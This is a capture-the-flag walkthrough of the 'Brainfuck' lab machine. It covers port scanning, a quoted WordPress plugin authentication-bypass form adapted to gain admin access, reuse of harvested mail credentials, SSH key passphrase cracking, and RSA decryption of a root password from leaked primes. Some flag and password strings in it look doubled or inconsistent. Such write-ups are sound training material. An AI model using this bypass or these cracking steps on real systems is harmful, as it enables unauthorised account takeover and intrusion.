Brainfuck
Initial Enumeration
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.17 -sV
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:29 EDT
Nmap scan report for 10.10.10.17
Host is up (0.16s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 25.16 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -n 10.10.10.17 -sV -sC -A -p22,25,110,143,443
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-10-20 02:33 EDT
Nmap scan report for 10.10.10.17
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP SASL(PLAIN) USER PIPELINING UIDL RESP-CODES CAPA AUTH-RESP-CODE
143/tcp open imap Dovecot imapd
|_imap-capabilities: post-login more SASL-IR ENABLE Pre-login OK LOGIN-REFERRALS LITERAL+ listed capabilities AUTH=PLAINA0001 IMAP4rev1 IDLE have ID
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_http-title: Welcome to nginx!
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.10.0 (Ubuntu)
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 54.93 seconds
Running our Nmap scan, we can see multiple ports open. We will briefly look through each of them.
HTTPS
Based on our Nmap scan, we are able to find some interesting information from the DNS portion:
Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htbNavigating over to the website, we just see a blank page with an expired certificate. We will add the DNS to our virtual host configuration file.
┌──(kali㉿kali)-[~]
└─$ sudo nano /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.17 www.brainfuck.htb brainfuck.htb sup3rs3cr3t.brainfuck.htbAfter adding these into the configuration file, we are able to access both of the webpages.
Immediately when opening the page, we can identify a potential user from the “Dev Update” notification: SMTP Integration is ready. Please check and send feedback to orestis@brainfuck.htb
Parameters:
Navigating further around the webpage, we note that each of the buttons leads to numerical ID's of a next webpage. For example, if i click on ‘Open Ticket’ tab from the navigation menu, I will be brought to ?page_id=6. This is the case for the entire website, and we can test out different values to see if we are able to find interesting information.
p=1 shows main page
page_id=2 gives us access to another page, /wp-admin. This page will redirect us to /wp-login
Wordpress Vulnerability
┌──(kali㉿kali)-[~]
└─$ wpscan --url <https://brainfuck.htb> --disable-tls-checks
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <https://brainfuck.htb/> [10.10.10.17]
[+] Started: Sun Oct 20 03:45:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <https://brainfuck.htb/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <https://brainfuck.htb/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <https://brainfuck.htb/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - <https://brainfuck.htb/?feed=rss2>, <generator><https://wordpress.org/?v=4.7.3></generator>
| - <https://brainfuck.htb/?feed=comments-rss2>, <generator><https://wordpress.org/?v=4.7.3></generator>
[+] WordPress theme in use: proficient
| Location: <https://brainfuck.htb/wp-content/themes/proficient/>
| Last Updated: 2024-10-16T00:00:00.000Z
| Readme: <https://brainfuck.htb/wp-content/themes/proficient/readme.txt>
| [!] The version is out of date, the latest version is 11.9
| Style URL: <https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3>
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: <https://speciatheme.com/>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - <https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3>, Match: 'Version: 1.0.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-support-plus-responsive-ticket-system
| Location: <https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/>
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - <https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt>
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:05 <======================================================> (137 / 137) 100.00% Time: 00:00:05
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at <https://wpscan.com/register>
[+] Finished: Sun Oct 20 03:45:26 2024
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 43.166 KB
[+] Data Received: 203.026 KB
[+] Memory used: 266.449 MB
[+] Elapsed time: 00:00:15Looking at the outdated version of Wordpress as well as the plugin wp suppor, we are able to get a potential exploit running. We will use searchsploit to see:
┌──(kali㉿kali)-[~]
└─$ searchsploit wordpress plugin wp support
--------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | php/webapps/40939.txt
--------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~]
└─$ cat /usr/share/exploitdb/exploits/php/webapps/41006.txt
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: <https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/>
# Exploit Author: Kacper Szurek
# Contact: <http://twitter.com/KacperSzurek>
# Website: <http://security.szurek.pl/>
# Category: web
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
<http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html>
2. Proof of Concept
<form method="post" action="<http://wp/wp-admin/admin-ajax.php>">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then you can go to admin panel. Running Exploit
We will then write our own modified version of the POC provided:
┌──(kali㉿kali)-[~]
└─$ cat wpadm.html
<form method="post" action="<https://brainfuck.htb/wp-admin/admin-ajax.php>">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="orestic@brainfuck.htb">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
┌──(kali㉿kali)-[~]
└─$ python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (<http://0.0.0.0:8000/>) ...
127.0.0.1 - - [20/Oct/2024 03:58:26] "GET /wpadm.html HTTP/1.1" 200 -After running the script, we navigate over to https://brainfuck.htb/wp-admin/admin-ajax.php and subsequently https://brainfuck.htb. This will give us admin access into the WordPress site.
Navigating over to the plugins page, we are able to find a interesting plugin → Easy WP SMTP. When we navigate over into settings, we are able to get the full credentials for our orestis user.
Username : orestis
E-Mail : orestis@brainfuck.htb
Form name: Orestis Makrogiannis
Password : kHGuERB29DNiNESMTP
With the credentials found, we will then attempt to log into the SMTP service.
┌──(kali㉿kali)-[~]
└─$ telnet -l orestis@brainfuck.htb 10.10.10.17 110
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
+OK Dovecot ready.
user orestis
+OK
pass kHGuERB29DNiNE
+OK Logged in.
list
+OK 2 messages:
1 977
2 514
.
retr 1
+OK 977 octets
Return-Path: <www-data@brainfuck.htb>
X-Original-To: orestis@brainfuck.htb
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 33)
id 7150023B32; Mon, 17 Apr 2017 20:15:40 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: New WordPress Site
X-PHP-Originating-Script: 33:class-phpmailer.php
Date: Mon, 17 Apr 2017 17:15:40 +0000
From: WordPress <wordpress@brainfuck.htb>
Message-ID: <00edcd034a67f3b0b6b43bab82b0f872@brainfuck.htb>
X-Mailer: PHPMailer 5.2.22 (<https://github.com/PHPMailer/PHPMailer>)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Your new WordPress site has been successfully set up at:
<https://brainfuck.htb>
You can log in to the administrator account with the following information:
Username: admin
Password: The password you chose during the install.
Log in here: <https://brainfuck.htb/wp-login.php>
We hope you enjoy your new site. Thanks!
--The WordPress Team
<https://wordpress.org/>
.
retr 2
+OK 514 octets
Return-Path: <root@brainfuck.htb>
X-Original-To: orestis
Delivered-To: orestis@brainfuck.htb
Received: by brainfuck (Postfix, from userid 0)
id 4227420AEB; Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
To: orestis@brainfuck.htb
Subject: Forum Access Details
Message-Id: <20170429101206.4227420AEB@brainfuck>
Date: Sat, 29 Apr 2017 13:12:06 +0300 (EEST)
From: root@brainfuck.htb (root)
Hi there, your credentials for our "secret" forum are below :)
username: orestis
password: kIEnnfEKJ#9UmdO
Regards
.We will try and see if this “secret” webpage contains any interesting information on for our newly found user password.
Nice. Upon further inspection, we are able to see 2 threads → Key as well as SSH Access. Reading through the thread on SSH Access, we can see that the administrator has set it such that password login is permanently disabled, and there is a requirement to use keys in order to gain access into the SSH service. Our user then proceeded to open an encrypted thread to get the key from the Administrator.
Decryption
Son of a bitch:
O orestis
Apr '17
Mya qutf de buj otv rms dy srd vkdof :)
Pieagnm - Jkoijeg nbw zwx mle grwsnn
A admin
Apr '17
Xua zxcbje iai c leer nzgpg ii uy...
O orestis
Apr '17
Ufgoqcbje....
Wejmvse - Fbtkqal zqb rso rnl cwihsf
A admin
Apr '17
Ybgbq wpl gw lto udgnju fcpp, C jybc zfu zrryolqp zfuz xjs rkeqxfrl ojwceec J uovg :)
mnvze://zsrivszwm.rfz/8cr5ai10r915218697i1w658enqc0cs8/ozrxnkc/ub_sja
O orestis
Apr '17
Si rbazmvm, Q'yq vtefc gfrkr nn ;)
Qbqquzs - Pnhekxs dpi fca fhf zdmgztok to be fair the url kinda gave it away. It looks similar to a shift cipher and we can assume the .rfz is basically .htb. We can use that to our advantage and run it on some online shift cipher decoder (i used chatgpt) but ultimately we are able to find the key as FUCKMYBRAIN. Below is the decrypted message:
O orestis
Apr '17
Hey give me the url for my key bitch :)
Orestis - Hacking for fun and profit
A admin
Apr '17
Say please and i just might do so...
O orestis
Apr '17
Pleeeease....
Orestis - Hacking for fun and profit
A admin
Apr '17
There you go you stupid fuck, I hope you remember your key password because I dont :)
<https://brainfuck.htb/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa>
O orestis
Apr '17
No problem, I'll brute force it ;)
Orestis - Hacking for fun and profitFrom there, we are able to download an id_rsa key for our user orestis.
Initial Foothold
With the user credentials found, we can finally use ssh to gain access into our user.
┌──(kali㉿kali)-[~]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:04 DONE (2024-10-20 05:04) 0.2450g/s 3054Kp/s 3054Kc/s 3054KC/s 3prash0..3pornuthin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh orestis@10.10.10.17 -i id_rsa
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Mon Oct 3 19:41:38 2022 from 10.10.14.23
orestis@brainfuck:~$ cat user.txt
2c11cfbc5b959f73ac15a3310bd097c92c11cfbc5b959f73ac15a3310bd097c9
Root Flag
From orestis's terminal, we are able to find some encryption methology:
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\\n')
debug.write(str(p)+'\\n')
debug.write(str(q)+'\\n')
debug.write(str(e)+'\\n')
orestis@brainfuck:~$ nano decrypt.py
orestis@brainfuck:~$ cat decrypt.py
import binascii, base64
p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
def egcd(a, b):
x,y, u,v = 0,1, 1,0
while a != 0:
q, r = b//a, b%a
m, n = x-u*q, y-v*q
b,a, x,y, u,v = a,r, u,v, m,n
gcd = b
return gcd, x, y
n = p*q #product of primes
phi = (p-1)*(q-1) #modular multiplicative inverse
gcd, a, b = egcd(e, phi) #calling extended euclidean algorithm
d = a #a is decryption key
out = hex(d)
print("d_hex: " + str(out));
print("n_dec: " + str(d));
pt = pow(ct, d, n)
print("pt_dec: " + str(pt))
out = hex(pt)
out = str(out[2:-1])
print "flag"
print out.decode("hex")
orestis@brainfuck:~$ python decrypt.py
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
n_dec: 8730619434505424202695243393110875299824837916005183495711605871599704226978295096241357277709197601637267370957300267235576794588910779384003565449171336685547398771618018696647404657266705536859125227436228202269747809884438885837599321762997276849457397006548009824608365446626232570922018165610149151977
pt_dec: 24604052029401386049980296953784287079059245867880966944246662849341507003750
flag
6efc1a5dbb8904751ce6566a305bb8ef6efc1a5dbb8904751ce6566a305bb8ef
Last updated
